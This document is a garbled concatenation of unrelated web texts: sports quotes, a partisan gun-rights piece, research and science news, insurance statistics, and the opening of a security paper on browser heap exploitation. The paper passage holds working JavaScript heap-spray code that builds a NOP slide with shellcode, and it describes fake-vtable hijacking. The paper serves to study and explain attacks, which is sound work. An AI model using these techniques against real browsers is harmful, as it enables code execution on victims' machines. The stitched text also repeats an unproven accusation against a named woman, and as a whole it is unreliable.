" She 's basically a whore , " he told ESPN.com 's David Newton .
" She shot and killed my dad . "
Mayfield 's father , Terry , died in 2007 at age 56 of what the Chapel Hill , N.C. , medical examiner called a self - inflicted gunshot wound to the chest .
There was no sign of criminal activity or foul play , according to the sheriff 's report , which noted Lisa Mayfield said Terry Mayfield was " very depressed about not talking with his son , Jeremy , that this was only a matter of time . "
Nevertheless , Mayfield told ESPN.com on Wednesday that his stepmother will be served with a wrongful death suit .
Mayfield said he went to his attorney on Thursday to start proceedings and plans to file on or before Aug. 15 .
" She knows what we 've got on her , " Mayfield said .
" For her to come out and do this is pretty ballsy .
Everybody that 's ever known me knows I never , ever have been around her for more than 10 hours of my life .
She 's a gold digger .
I knew that from day one . "
Although he said he has no proof , Mayfield claimed that NASCAR paid Lisa Mayfield for her affidavit .
" It would n't take much money .
She tried to get money from me , " Mayfield said .
" I have a very short fuse when it comes to her . "
Senator Fred Madden Of New Jersey No Friend To The Constitution
WARNING VOTERS : Turn -coat Gun Banning Senator Fred Madden was the lone vote that sold out NJ Gun owners rights in spring 2009 .
Trenton , NJ – -( AmmoLand.com ) -
In spring 2009 , Senator Madden cast the single vote that limited the Second Amendment rights of New Jersey gun owning residents when he worked with Gun Banning Governor John Corzine to pass a gun rationing bill .
Madden who has served in the New Jersey State Senate since 2004 , where he represents the 4th Legislative District was once consider a friend of the constitution but now is clearly on the side of anti gunners .
Under the direction of Governor Jon Corzine ( D ) and with little notice to the public to ensure that New Jersey sportsmen and gun owners were not prepared to defend their Second Amendment rights from gun rationing schemes ; the New Jersey State Senator , Fred Madden , tuned his back on the state police and law abiding gun owners and voted YES to bill S1774 “ One Gun - A - Month ” .
As passed , this bill will prohibit an individual from purchasing more than one handgun within a 30 - day period .
It is unclear at this point what Madden traded with Corzine to sell out NJ gun owners but looking at his history Senator Fred H. Madden , Jr. has repeatedly refused to provide any responses to citizens on issues through the National Political Awareness
Test when asked to do so by Project Vote Smart .
New Jersey voters need to take a stand against Senator Fred Madden and vote him out of office to show politicians that we will not stand by and let our constitutional rights be stripped from us .
Vote No for Senator Fred Madden when running for re-election in 2011 .
Overview
Computing and communicating through the Web makes it virtually impossible to leave the past behind .
College Facebook posts or pictures can resurface during a job interview ; a lost or stolen laptop can expose personal photos or messages ; or a legal investigation can subpoena the entire contents of a home or work computer , uncovering incriminating or just embarrassing details from the past .
Our research seeks to protect the privacy of past , archived data — such as copies of emails maintained by an email provider — against accidental , malicious , and legal attacks .
Specifically , we wish to ensure that all copies of certain data become unreadable after a user - specified time , without any specific action on the part of a user , without needing to trust any single third party to perform the deletion , and even if an attacker obtains both a cached copy of that data and the user 's cryptographic keys and passwords .
Vanish is a research project aimed at meeting this challenge through a novel integration of cryptographic techniques with distributed systems .
We initially implemented a proof - of - concept Vanish prototype that uses the million - node Vuze BitTorrent DHT to create self - destructing data .
For a description of our Vuze - based self - destructing data system , please refer to our paper .
Thanks to research done by others , we found that the initial Vuze DHT implementation on which Vanish was based was not adequately protected against Sybil attacks that seek to harvest data from the DHT .
In part , this was due to overly eager replication for availability , and in part , it is due to the fact that existing DHTs were not designed with such attacks in mind .
In response , we have been working with Paul Gardner from Vuze , Inc. to implement , deploy , and evaluate at scale measures for improving Vuze 's security against Sybil - driven data - harvesting attacks .
Specifically , our measures : ( 1 ) limit the excessive amount of replication that currently exists in Vuze , and ( 2 ) limit the ability of an attacker to perform large - scale Sybil attacks .
Our evaluation shows that our combined defenses significantly raise the bar against Sybil data - harvesting attacks .
A comprehensive evaluation of all of our defenses is currently underway and will be available shortly .
In addition , we are investigating new directions and architectures for self - destructing data .
We believe that the future for self - destructing data is to leverage multiple back - end storage systems ( both DHTs and other types of distributed structures ) in such a way that compromising Vanish would require compromising all of the storage systems .
As a proof of concept of this idea , in Sept. 2009 we released a new prototype that splits the keys across both Vuze DHT and OpenDHT .
In collaboration with Vinnie Moscaritolo from PGP Corporation , we are now investigating new storage backends for Vanish that have fundamentally different properties and threat models than DHTs .
Once again , new developments in self - destructing data are underway , so stay tuned -- we will describe the latest advances in Vanish research on our publications page as they become available .
Research Contributions
Overall , we have thus far made several significant contributions to the self - destructing data problem and beyond ; some of these contributions are already published , while others are still in the works :
We defined an ambitious research agenda for self - destructing data in the cloud .
A significant requirement in this agenda is deletion without trusting any single party .
This agenda is introduced in a paper that appeared at USENIX Security '09 .
We designed and built a prototype distributed - trust self - destructing data system based on the Vuze DHT .
A description and preliminary evaluation of our prototype is included in our USENIX Security '09 paper Following the demonstration of Vuze 's susceptibility to Sybil data - crawling attacks , we designed , implemented and deployed security - enhancing features to the live million - node Vuze DHT .
We are currently working on a paper that demonstrates these features .
We designed new alternative structures for self - destructing data based on geographically distributed servers and hierarchical secret sharing .
Our next paper will also include descriptions of these new structures .
Inspired by our efforts to make the Vuze DHT mold Vanish better , we designed a next - generation " active " DHT , called Comet , that expands the application space for key - value storage systems by building support for application - specific customizations into these systems .
A paper describing Comet will appear at OSDI ' 10 .
People
Acknowledgements
This work is supported by NSF grants NSF - 0846065 , NSF - 0627367 , and NSF - 614975 , an Alfred P. Sloan Research Fellowship , the Wissner - Slivka Chair , and a gift from Intel Corporation .
More than 25 years ago , in a research establishment in the Swiss Alps , a British - born computer scientist dreamt up a new way for academics to share information around the globe .
That scientist was Tim Berners - Lee , and he first introduced his idea on March 12 , 1989 .
Little did he realize that his invention would break out from the confines of academia and give birth to the global internet , the World Wide Web .
More than two decades on , there are over 200 million websites and over one trillion unique URLs .
An astounding 3.4 billion people use the web worldwide – that 's nearly half of the world 's population .
In the UK , the figure stands at over 92 % of the population .
Meanwhile , 88.5 % of Americans and 85 % of Australians use the internet , too .
With that in mind , we 're looking back on how and why the web came into being , taking a look at how the web 's key technologies have changed since the early '90s and investigating how it has affected our society and culture .
To illustrate how vividly things have changed , we 'll take a snapshot of the web at five stages in its development – at five , 10 , 15 , 20 and 25 years old ( and beyond ) .
To complete our long look at the World Wide Web – technology 's millennial – , we once consulted an expert to find out just how different it could look in another five years ' time .
So , we 'll see just how right those projections were with some crystal - clear hindsight .
Plus , we 'll offer some ( safe ) projections of our own for the World Wide Web as it inches toward its 30th birthday .
How it all began
The web might have come into being 20 years ago , but that was n't the start of the internet – far from it .
To find the first faltering steps of the information superhighway we have to turn the clock back almost 40 years to the launch of the Advanced Research Projects Agency Network , or ARPANET , which is widely regarded as the evolutionary starting point of the internet we know today .
So to see why the web was so revolutionary , we need to investigate how the internet looked back in the late ' 70s
Some aspects of ARPANET - inspired technology are still with us .
ARPANET was the world 's first packet switching network , and some of its technologies – including email , FTP ( file transfer protocol ) for uploading and downloading files , and Usenet , which served a similar purpose to today 's web - based newsgroups – were already in existence .
The biggest differences between these systems and their modern - day counterparts lies in the user interface more than the underlying technology .
The older services were accessed using typed commands rather than via the now - ubiquitous graphical user interface .
Growing chaos
A more fundamental difference was in the way that people found information .
In those pre-web days , that meant either knowing about information sources via word of mouth , email or newsgroups , or perhaps by accessing online library catalogs using the Telnet protocol for running programs on remote computers .
When the internet was tiny , this haphazard system worked ( just about ) , but by the late ' 80s it was starting to get out of hand .
American initiatives such as Gopher ( as in ' go for ' ) , WAIS ( Wide Area Information Server ) , Archie and Veronica all did their bit to simplify internet information management , but , as it turned out , they were all doomed to relative obscurity in the light of events taking place across the Atlantic .
This marked Berners - Lee's , an Oxford - educated computer scientist then working at CERN in Switzerland , arrival on the scene .
On that ( probably ) cold day in March , he proposed his new system for managing online information .
Berners - Lee envisaged a system in which hypertext documents could be linked together .
By clicking on a ' hot spot ' ( or link ) in one document , the user would be automatically transferred to the document that was referenced in that link .
What 's more , Berners - Lee suggested that documents could be linked together without any central control or coordination .
The proposal was accepted , and a year later Berners - Lee finished the first ever browser .
He named it WorldWideWeb ( with no spaces ) .
It ran on a NeXT cube computer , and despite its lack of color and absence of in - line graphics , the fundamentals would be familiar to today 's web users .
Later on , the browser was renamed Nexus to differentiate it from the abstract space that became known as the World Wide Web ( with spaces ) .
Opening the gates
However innovative , who knows whether the concept of globally hyperlinked documents would have taken the world by storm if it was n't for a couple of political and commercial decisions that took place in those early years .
In March 1993 , America 's National Science Foundation decided that its network backbone would no longer be restricted to academic institutions .
Then , just a month later , CERN made its web technology free for anyone to use .
The floodgates were opened – and the world would never be quite the same again .
Five years old
Five years in , the web was just starting to come to the attention of the public , although at this stage it was still mostly computer enthusiasts who were getting involved .
One product that was instrumental in bringing the web to the man in the street was called Internet in a Box .
Launched by Spry in 1994 , it was , to quote the promotional literature , " the first shrink - wrapped package to provide a total solution for PC users to get on the internet " .
Included in the box was the necessary software to allow Windows to communicate with the internet , a subscription with an ISP and a copy of the Mosaic web browser .
Other such packages would soon follow .
The Mosaic web browser really epitomized the web of the mid-'90s , and it's also the product that is widely acknowledged to have first popularized the web .
Developed in 1993 , the software would later evolve into Netscape Navigator , the descendant of which is still with us today in the form of popular browser Mozilla Firefox .
As with most things related to the internet in those pioneering days , Mosaic was written for the Unix operating system , but other versions were soon released for the Macintosh and , more importantly , the PC .
It was the first browser to display images inline with text instead of displaying them in a separate window .
In many ways , it still resembles the browser of today .
EARLY ANCESTOR : Even as early as 1994 , Mosaic could display blue hyperlinks and inline graphics
These early times were also the days of massive growth , even though the numbers pale into insignificance compared to today 's figures .
In mid-1993 there were just 130 websites worldwide , but by the end of 1994 , when the web had reached its fifth birthday , this figure had grown to over 12,000 .
However , only 18 per cent of these websites had magic " .com " URLs – and the commercialization of the web was only just beginning .
10 years old
Now that knowledge of the internet was becoming commonplace , software wars were breaking out .
Of particular note was the moment that Microsoft introduced Internet Explorer to compete head - on with Netscape Navigator .
In the next five momentous years , no less than five versions of Internet Explorer and four of Netscape Navigator were released .
IE finally came out victorious once Microsoft fully integrated it into Windows , but the real beneficiary of those browser wars was the user – the web browsing experience changed out of all recognition .
OLD NEWS : Familiar names like Google had appeared by 1999 , but they were yet to oust established search engines such as Northern Light
No longer did the web comprise only static information : dynamic content had entered the scene with a vengeance .
Audio and video multimedia content could now be displayed on web pages .
Far more fundamental was support for a range of technologies including the now familiar JavaScript , ActiveX controls and cascading style sheets .
This meant that web pages could feature animation and users could fill in forms online and run applications such as games .
By the web 's 10th birthday , search engines had also made their presence felt .
Although search apps had been around five years earlier , they were small fry then .
By now their commercial potential had been recognized , and several sites were vying for the number one spot .
At the time , Northern Light and AltaVista were tied with 150 million pages each , but Google was closing in rapidly .
The browser wars and the search engine wars were the tip of the iceberg .
The web was now big business and there was no shortage of young companies eager to get a piece of the greatest publishing revolution since the invention of the printing press .
These were the glory days of the ' dot com ' companies , with well - known names such as Amazon , eBay , Expedia , Google and Yahoo all appearing .
Not all the dotcoms would be successful , though , and another year down the line the bubble would burst , leaving financial catastrophe in its wake .
15 years old
While previously the web had been all about finding information , things had started to change by the time it reached the wise old age of 15 .
Change number one was that more people started to shop online frequently .
Web - based retailer Amazon posted its first profitable year with international sales up 33 % on the previous year .
Meanwhile eBay had over 135 million registered users , up 43 % on 2003 .
Between them , the two companies had sold or bought almost $ 10 billion worth of merchandise .
In the UK , specialist e-retailers were joined by the traditional outlets such as Argus and Screwfix , who were soon to be up there with Amazon at the top of the league table for online shopping .
With low - cost airlines , holiday companies and the major supermarkets also providing an online ordering service , around 33 per cent of Britons were now shopping online .
Each spent an average of over £ 500 per year .
Goods worth £ 3.3 billion were shifted in the 10 week run -up Christmas .
Mainstream online shopping had come of age .
Change number two was the way in which social interaction happened online .
The likes of MySpace and Facebook were still small fry , but their predecessors were starting to get a foothold .
As blogging really took off , web users got into the habit of providing web content rather than just consuming it for the first time .
Instant messaging was also in a period of massive growth .
Strictly speaking , IM is n't a web application ( because behind the scenes it does n't use HTTP ) but most users do n't care about the nuts and bolts , and it's an important stepping - stone to social networking .
Chatrooms were also taking off , and in one way or another vast numbers of people were interacting with each other online without the delay inherent in email exchanges .
20 years old
Twenty years on , all of the technologies and trends we 've seen emerge in two decades are still going strong .
The mainstay of the web is still hyperlinked pages of information , even though many of those links are now graphical rather than blue text and active content is the rule rather than the exception .
Search engines continue to flourish alongside newer web presences such as online shopping sites .
Does this mean the web is now mature and the days of change are long gone ?
Not a bit of it .
At our last milestone , many of the changes to the web were inspired by commercial and social pressures rather than technology .
But in the last five years advances in technology are , once again , making their impact felt .
Five years ago , only seven per cent of the UK 's internet users had a broadband connection , far behind much of the rest of the developed world .
By 2007 , half of all adults in the UK had fast internet access at home and , as of today , 95.1 % of all the UK 's connections to the internet are via broadband .
Connection speeds have also escalated .
Today the average speed a broadband user in the UK can expect is 4.3 Mbps .
Virgin 's cable broadband offers up to 50 Mbps .
Worldwide , even higher speeds are available – 100 Mbps is considered normal in Japan – so it's no surprise that the web of 2009 has taken advantage of all this extra bandwidth .
First and foremost this means more multimedia content .
YouTube would be barely usable over a dial - up connection .
Today , millions of people have taken heed of the site 's invitation to ' Broadcast Yourself ' , with 15 hours of video being uploaded to the site every minute .
In the US alone , over 100 million viewers watch over six billion movies per month .
The BBC iPlayer is another beneficiary of high - speed internet connections .
Launched in December 2007 , it 's still the new kid on the block but already the iPlayer is providing over half a million people a day with the opportunity to watch programs they 've missed or view again those they enjoyed .
WATCH THIS SPACE : The BBC iPlayer , which attracts millions of visitors , is only viable because of the massive take - up of broadband internet services over the last couple of years
The other big success story is the iTunes Store , the music download site provided by Apple in the wake of the hugely popular iPod .
To date , downloads account for less than 10 per cent of music sales , but with CD sales falling , it 's clear where the future lies .
But the popularity of broadband does n't mean that the web is now solely about multimedia .
As Google Earth has shown , the public still have an appetite for information .
Using a smart plug - in , the user 's PC can interact with a database of satellite imagery on Google 's computers .
As a result , 2.5 million people a month in the UK alone are experiencing what was formerly the sole domain of the military .
Technology has also come to the fore in the case of the mobile internet .
No longer is browsing the web only something to be done sitting at a desk .
With the combination of Wi-Fi hotspots , web - enabled mobile phones and the new MID ( Mobile Internet Device ) platform , we can go online anywhere .
This ability is also key in changing how we use the web .
With the exception of keeping up to date with the news , a survey at the time showed that social networking is the major reason for accessing the web while out and about .
If you 're used to being able to text friends anywhere , it does n't make sense that you can only contact them via social - networking sites while sitting at your desk .
The mobile internet has catapulted Facebook and MySpace into the major league .
Meanwhile , in a bizarre example of how the web in its twenties is affecting lives , a British woman divorced her husband because his alter ego in the online community Second Life had an affair with a virtual woman in a virtual world .
25 years and beyond
Judging from the web 's population nearly doubling in the past seven years , Web technology shows no signs of running out of steam .
It 's obvious that the web of 27 years is markedly different from the web of 2009 .
Back then , we spoke to Rohit Agarwal , then - director of Marketing and Innovation for AOL Europe , to get an idea of how the web could have evolved even further over the next five years .
Agarwal 's vision of the future ( now present ) revolved round three key themes – web access versus web experience , voice - enabled web and the realisation of cloud computing .
Turns out that he pretty much nailed it .
" With the world permanently and ubiquitously online , the question will be about the user experience , " said Agarwal .
" Access to the web and to the information you want will be available anywhere and at any time from a whole myriad of devices . "
Bingo .
The meteoric rise in the amount of people with access to the World Wide Web is directly correlated with the rise of not only smartphones , but tablets .
In fact , mobile is on track to account for 2 billion of the 3.4 billion - and - counting internet users worldwide this year .
" The iPhone may be credited as the device that first made the mobile internet a truly enjoyable user experience through its large touchscreen display , and similar handsets are being produced .
But this is only one side of the move away from the desktop as the main point of contact with the web .
The other side of the development will see television and the web fully converge , giving a more complete and interactive experience . "
Another bullseye !
Smart TVs are all but set to take over the market , spurred in development by the major gaming consoles equipping themselves with marquee streaming apps in the late aughts .
In fact , Netflix claimed 37 % of peak hours internet bandwidth in the US as of November 2015 , a number that could very well continue to grow .
" Voice - enabled web will make it possible to control your computer through voice commands , " said Agarwal .
" Microsoft and Nuance serve as incumbents to this technology , and other companies have the opportunity to develop it .
Well , he 's right in that at least everyone is trying ?
Microsoft , Apple and Google all have their hands in this pie , each with their own virtual assistant – Cortana , Siri and Google Now , respectively .
This is one of those projections that Agarwal may have simply been a bit too bullish one .
There 's no doubt that this is the future of the World Wide Web , but it may not become a feasible reality for another five years or more .
" Through the realisation of cloud computing we will be able to synchronise our online life and always have access to our personal media assets , no matter where we are .
We will be able to edit , create and share movies , documents and personal media within this cloud through online apps that no longer require local software installation . "
No doubt about this one .
If you have n't been all but forced to buy into cloud storage for your myriad selfies and totally - legit songs by now , trust us , it 's coming .
Agarwal nailed this one too , but it 's gone even further than this : server farms are now powering our online games for us , with hits like Titanfall and Halo 5 making liberal use of Microsoft 's Azure cloud system to offload the toughest bits of processing to its servers .
TIME FOR THE WEB PART : Devices like the Nest internet - connected thermostat are poised for a takeover
Agarwal stressed that many of these technologies are already with us .
" The key " , he said , " is that they will continue to converge , becoming an interconnected personal experience and adding value to each part of your everyday life . "
Finally , Agarwal aced this one too , if only for being a little vague .
But here 's the deal : from the devices in our pockets to the smart ones that are replacing the " dumb " ones in our homes , the World Wide Web will continue to pervade the world in two key ways .
One , voice control , voice recognition and web - assisted artificial intelligence are only growing in scope and capability .
While we 're a ways off from the world depicted in Her , talking to your phone or computer without feeling like a dunce is well within our grasp .
In fact , with the dawn of bots , we 're quickly approaching a point in which we 'll barely have to speak to our computers – they 'll just know what to do based on our routines .
( And text messages that simply read " PIZZA " . )
Two , the Internet of Things may sound like a joke right now , but so did a phone that could play music and retrieve your email at the same time back in 2007 .
Give this blanket term for internet - connected appliances another five to 10 years , and you 'll have an internet - enabled toaster like the rest of us .
To celebrate the 25th anniversary of the world wide web we are offering an extra 25 % off all subscriptions and single issues on our sister technology magazines !
Just click here and , once you 've chosen your products , enter the code WWW25 at checkout to claim your discount .
The European Space Agency 's Herschel and Planck space telescopes safely blasted off this afternoon at 13:12 GMT from the ESA spaceport in French Guiana .
ESA reports : " Herschel , the upper passenger , was the first to separate from the upper stage of the Ariane 5 at 13:37 GMT at an altitude of about 1,140 km over the east coast of Africa .
About 1.5 minutes later , the ... support structure that enclosed Planck came off and separated .
" It was followed by Planck at 13:40 GMT at an altitude of about 1,700 km slightly East of the east coast of Africa . "
At 13:49 GMT , ESA confirmed its New Norcia tracking station in Western Australia had received the first signals from both spacecraft .
ESA elaborates : " The mission control teams will continue to receive telemetry from Herschel via New Norcia , and for Planck via ESA ’s antenna at Perth , also in Australia .
Spacecraft Operations Engineers at the Mission Control Centre will use these data to assess the overall health of the satellites after launch .
" Almost immediately after telemetry reception starts , engineers will determine the actual trajectory of each satellite so that it can be fine - tuned for planned trajectory correction manoeuvres . "
ESA ’s Director General , Jean - Jacques Dordain , enthused : “ This dual launch is the crowning of some 20 years of hard work for the scientists who imagined these missions , the engineers who designed these satellites , the firms that built them and the ESA staff who coordinated all these efforts .
“ This marvellous work could never have been accomplished without the commitment of all of ESA 's Member States , which have consistently ensured that Space Science remains the backbone of our activities .
An outstanding Space Science programme shaped by scientific communities across Europe , driving innovation , and embedding new technologies for the benefit of all citizens . ”
The ' scopes are now en route to Lagrangian point L2 , around 1.5 million km from Earth .
Herschel is tasked with probing the cosmos with its infrared telescope - the largest ever put into space - while Planck 's mission is to study the Cosmic Microwave Background .
David Southwood , ESA Director of Science and Robotic Exploration , said : “ With Herschel we can resume the pioneering work undertaken with ISO , ESA ’s first infrared space observatory operating in the second half of the 90s , and we are building upon the experience gained to date by the world wide scientific community in the field of infrared astronomy . ”
He added : “ Planck is ESA ’s first mission dedicated to the study of relic radiation from the Big Bang , designed to continue the marvellous work undertaken over the last 20 years by Russia ’s Relikt , and NASA ’s COBE and WMAP satellites .
“ With Planck , we are pushing the boundaries of our knowledge to the very limits of what can be observed according to theory .
It is a tremendous technical challenge but helping to bring about a great leap forward in our understanding of the origin and perhaps the fate of our Universe will be a tremendous reward too . ”
Herschel and Planck are due to start their observations in about two months .
They have associated mission blogs , and you can keep tabs on Herschel here and Planck here .
The ESA launch special is here . ®
Before we can begin to implement sustainable , carbon - neutral gasoline - " grassoline " - from inedible plant material like fast - growing weeds and agricultural waste , some technology hurdles have to be overcome .
Namely , finding better ways to break lignocellulosic biomass down into fermentable sugars .
The use of ionic liquids - salts that are liquids rather than crystals at room temperature - to dissolve lignocellulose and later help hydrolyze the resulting liquor into sugars , shows promise as a way of pre-treating biomass for a more efficient conversion into fuels .
However , the best ionic liquids in terms of effectiveness are also prohibitively expensive for use on a mass scale .
Furthermore , scientists know little beyond the fact that ionic liquids do work .
Understanding how ionic liquids are able to dissolve lignocellulosic biomass should pave the way for finding new and better varieties for use in biofuels .
These fluorescence images of a stem of switchgrass treated with EmimAc ionic liquid shows the section ( a ) before treatment ( b ) 20 minutes after treatment ( c ) 50 minutes after treatment and ( d ) two hours after treatment when the organized plant cell wall structure has been completely broken down .
Credit : LBLA new technique that is providing some much needed answers has been developed by researchers at the Joint BioEnergy Institute ( JBEI ) , a U.S. Department of Energy Bioenergy Research Center led by the Lawrence Berkeley National Laboratory ( Berkeley Lab ) .
Based on the natural auto - fluorescence of plant cell walls , this technique enables researchers for the first time to dynamically track solubilization during an ionic liquid pretreatment of a biomass sample , and to accurately and quickly assess the liquid ’s performance without the need of labor - intensive and time - consuming chemical and immunological labeling .
“ Working with switchgrass and using the ionic liquid known as EmimAc ( 1 - n - ethyl - 3 - methylimidazolium acetate ) , which is currently the most effective known to date in terms of pre-treating biomass , we observed a rapid swelling of the secondary plant cell walls within ten minutes of exposure at relatively mild temperatures ( 120 degrees Celsius ) , ” says Blake Simmons , a chemical engineer who is Vice President of JBEI ’s Deconstruction Division and was the principal investigator for this research .
“ We attributed the swelling to disruption of inter - and intra-molecular hydrogen bonding between cellulose fibrils and lignin .
The swelling was followed by complete dissolution of biomass over three hours .
This is the first study to show the process by which biomass solubilization occurs in an ionic liquid pre-treatment using these techniques .
” Simmons says that once the EmimAc had dissolved the switchgrass biomass into its three components - cellulose and hemicellulose sugars , plus lignin , the woody fiber that gives strength and structure to plant cell walls - the subsequent addition of an anti-solvent , such as water , resulted in the sugars being precipitated out while most of the lignin remained in solution , a requirement for recovering the sugars .
This confirmed that the ionic liquid pre-treatment effectively disrupted the recalcitrance of the switchgrass biomass and helped liberate the fermentable sugars .
“ In comparison to untreated biomass , ionic liquid pretreated biomass produces cellulose that is efficiently hydrolyzed with commercial cellulase cocktail and provides sugar yields over a relatively short time interval , ” Simmons says .
“ We are now in the process of evaluating other ionic liquids to discover the optimal combination of cost and performance .
” Auto - fluorescence is an intrinsic optical property of biological materials that has often been viewed as a nuisance by scientists trying to image specific biological objects .
Living cells contain molecules which fluoresce when excited by the right light and this fluorescence can compete with the signals obtained from the fluorophore dyes or markers used to label biological objects of interest .
Simmons and Singh have turned this “ nuisance ” into an effective tool .
Using auto - fluorescence in combination with a variety of microscopy and spectroscopy techniques , they were able to map and visualize cellulose and lignin first in pristine switchgrass and then during pre-treatment with the EmimAc ionic liquid .
Their results demonstrate that this label - free visualization and mapping technique can provide a means of rapidly screening a wide range of ionic liquids for pre-treating switchgrass and other biomass material .
“ Our approach can be used to evaluate the deconstruction of lignocellulosics in biomass of different chemical compositions , and also to assist in determining the impact of genetically engineered feedstocks , ” Simmons says .
“ By utilizing this technique , the development and selection of pre-treatment conditions for the selective solubilization and fractionation of either polysaccharides or lignin could be tailored for the development of cost - effective biomass pre-treatments with enhanced yields of sugars .
” The ultimate goal , Simmons says , is to find an ionic liquid that can efficiently pre-treat biomass , then scale its use up into a cost - effective process for biorefineries .
Ideally , he and his colleagues would like to identify a single versatile ionic liquid that is capable of producing enriched polysaccharide and lignin output streams irrespective of feedstock and fuel types .
But there is much more basic research ahead .
“ Right now ionic liquids are a bench - top technique , ” Simmons says , “ and there are research and engineering obstacles that must be solved before this technology is ready for prime time .
But the drivers are clear , and ionic liquids offer processing advantages that no other current commercial pre-treatment technology can provide .
” The results of this study were reported in the journal Biotechnology and Bioengeering in a paper entitled : “ Visualization of Biomass Solubilization and Cellulose Regeneration During Ionic Liquid Pretreatment of Switchgrass ” Co-authoring the paper with Simmons were his JBEI colleague Seema Singh , and Kenneth Vogel , of the U.S. Department of Agriculture ’s Agricultural Research Service , located in Lincoln , NE .
Simmons and Singh also hold appointments with Sandia National Laboratories .
About 1 % of all apps that are uploaded to the Android Market are removed by Google .
Â
Even with such a low percentage , it still begs the question “ Does Google play gatekeeper to the Market ? ”
Â
The answer is both yes and no .
Google allows the users of the Android Market to help decide what abides by their policies .
Â
If an application is flagged enough times , it gets reviewed by Google who then makes the determination as to whether or not to remove the application .
Â
Google does not stand in the way of allowing an app into the Market in the same way Apple does with their App Store . Â
In short , there is no pre-approval process .
As of today ’s writing , there are roughly 6,000 apps in the Market , which equates to around 60 apps getting pulled .
Android users seem to have a good grasp as to what is quality and what can be considered buggy , malicious , or objectionable .
The Android Market has plenty of room for improvement to be sure .
Â
However , the approval / removal process that is currently in place seems to work well .
Â
Letting the mob rule was a good decision on Google ’s part .
Â
It eliminates the need for a staff dedicated to combing through apps ahead of time .
Apple , on the other hand , employs 40 people to handle the job .
Â
Each of the reviews an estimated 424 apps a week .
Source : mocoNews | Fierce Developer
Do n’t Underestimate The Importance of Disability Insurance
Posted on August 11 , 2009 and updated September 21 , 2010 in 2 min read August 11 , 2009 andin Life Insurance Canada News
What people mostly imagine under ‘ disability ’ is the loss of mobility after a sudden accident related either to work or sport .
But the statistic tells us quite a different story : people are twice as much likely to be disabled due to a serious illness such as cancer , diabetes or heart disease than to an accident .
Your chances of becoming disabled ;
People under 65 years of age are twice as much likely to become long - term disabled than to die due to accident or illness .
Of course the chances of becoming disabled gradually raises with age :
3 in 100 children up to 14 years of age become disabled
4 in 100 young adults between 15 to 24 become disabled
7 in 100 adults between 25 to 44 become disabled
17 in 100 adults between 45 to 64 become disabled
40 in 100 adults 65 and over become disabled
53 in 100 adults over 75 reported disability
( Source : Statcan )
At the moment 14 in 100 Canadians ( 4.4 million ) are classed as disabled .
( Do n’t Underestimate The Importance of Disability Insurance continued … )
After coming up with the initial concept , I came up with a couple alternate versions that I was n’t sure whether to upload or not .
Going under the assumption that “ Less is more , ” I decided to stick with the original concept as the main comic , but also link to the others .
Here is Version 2 , and here is Version 3 !
Either way , it ’s odd how Mario is supposed to save the Mushroom Kingdom , yet the guy is freely hurling fire throughout dozens of flammable environments .
I bet that guy ’s flame - per - year output is far greater than Bowser ’s .
It makes you think …
Heap Feng Shui in JavaScript
Alexander Sotirov < asotirov@determina.com >
Introduction
The exploitation of heap corruption vulnerabilities on the Windows platform has become increasingly more difficult since the introduction of XP SP2 .
Heap protection features such as safe unlinking and heap cookies have been successful in stopping most generic heap exploitation techniques .
Methods for bypassing the heap protection exist , but they require a great degree of control over the allocation patterns of the vulnerable application .
This paper introduces a new technique for precise manipulation of the browser heap layout using specific sequences of JavaScript allocations .
We present a JavaScript library with functions for setting up the heap in a controlled state before triggering a heap corruption bug .
This allows us to exploit very difficult heap corruption vulnerabilities with great reliability and precision .
We will focus on Internet Explorer exploitation , but the general techniques presented here are potentially applicable to any other browser or scripting environment .
Previous work
The most widely used browser heap exploitation technique is the heap spraying method developed by SkyLined for his Internet Explorer IFRAME exploit .
This technique uses JavaScript to create multiple strings containing a NOP slide and shellcode .
The JavaScript runtime stores the data for each string in a new block on the heap .
Heap allocations usually start at the beginning of the address space and go up .
After allocating 200MB of memory for the strings , any address between 50MB and 200MB is very likely to point at the NOP slide .
Overwriting a return address or a function pointer with an address in this range will lead to a jump to the NOP slide and shellcode execution .
The following JavaScript code illustrates this technique :
var nop = unescape ( " %u9090%u9090 " ) ; //
Create a 1MB string of NOP instructions followed by shellcode : // // malloc header string length NOP slide shellcode NULL terminator // 32 bytes 4 bytes x bytes y bytes 2 bytes while ( nop.length <= 0x100000 / 2 ) nop += nop ; nop = nop.
substring (0 , 0x100000/2 - 32/2 - 4/2 - shellcode.length - 2/2 ) ; var x = new Array ( ) ; //
Fill 200MB of memory with copies of the NOP slide and shellcode for ( var i = 0 ; i < 200 ; i++ ) { x [ i ] = nop + shellcode ; }
A slight variation of this technique can be used to exploit vtable and object pointer overwrites .
If an object pointer is used for a virtual function call , the compiler generates code similar to the following :
mov ecx , dword ptr [ eax ] ; get the vtable address push eax ; pass C++ this pointer as the first argument call dword ptr [ ecx+08 h ] ; call the function at offset 0x8 in the vtable
The first four bytes of every C++ object contain a pointer to the vtable .
To exploit an overwritten object pointer , we need to use an address that points to a fake object with a fake vtable that contains pointers to the shellcode .
It turns out that setting up this kind of structure in memory is not as hard as it seems .
The first step is to use a sequence of 0xC bytes for the NOP slide and overwrite the object pointer with an address that points to the slide .
The virtual table pointer in the beginning of the fake object will be a dword from the NOP slide that points to 0x0C0C0C0C .
The memory at this address will also contain 0xC bytes from the NOP slide , and all virtual function pointers in the fake vtable will point back to the slide at 0x0C0C0C0C .
Calling any virtual function of the object will result in a call to the shellcode .
The sequence of dereferences is show below :
object pointer --> fake object --> fake vtable --> fake virtual function addr : xxxx addr : yyyy addr : 0x0C0C0C0C addr : 0x0C0C0C0C data : yyyy data : 0x0C0C0C0C data : +0 0x0C0C0C0C data : nop slide +4 0x0C0C0C0C shellcode +8 0x0C0C0C0C
The key observation from SkyLined 's technique is that the system heap is accessible from JavaScript code .
This paper will take this idea even further and will explore ways to completely control the heap with JavaScript .
Motivation
The heap spraying technique described above is surprisingly effective , but it alone is not sufficient for reliable heap exploitation .
There are two reasons for this .
On Windows XP SP2 and later systems it is easier to exploit heap corruption vulnerabilities by overwriting application data on the heap , rather than corrupting the internal malloc data structures .
This is because the heap allocator performs additional verification of the malloc chunk headers and the doubly - linked lists of free blocks , which renders the standard heap exploitation methods ineffective .
As a result , many exploits use the heap spraying technique to fill the address space with shellcode and then try to overwrite an object or vtable pointer on the heap .
The heap protection in the operating system does not extend to the application data stored in memory .
The state of the heap is hard to predict , however , and there is no guarantee that the overwritten memory will always contain the same data .
In this case the exploit might fail .
One example of this is the ie_webview_setslice exploit in the Metasploit Framework .
It triggers a heap corruption vulnerability repeatedly , hoping to trash enough of the heap to cause a jump to random heap memory .
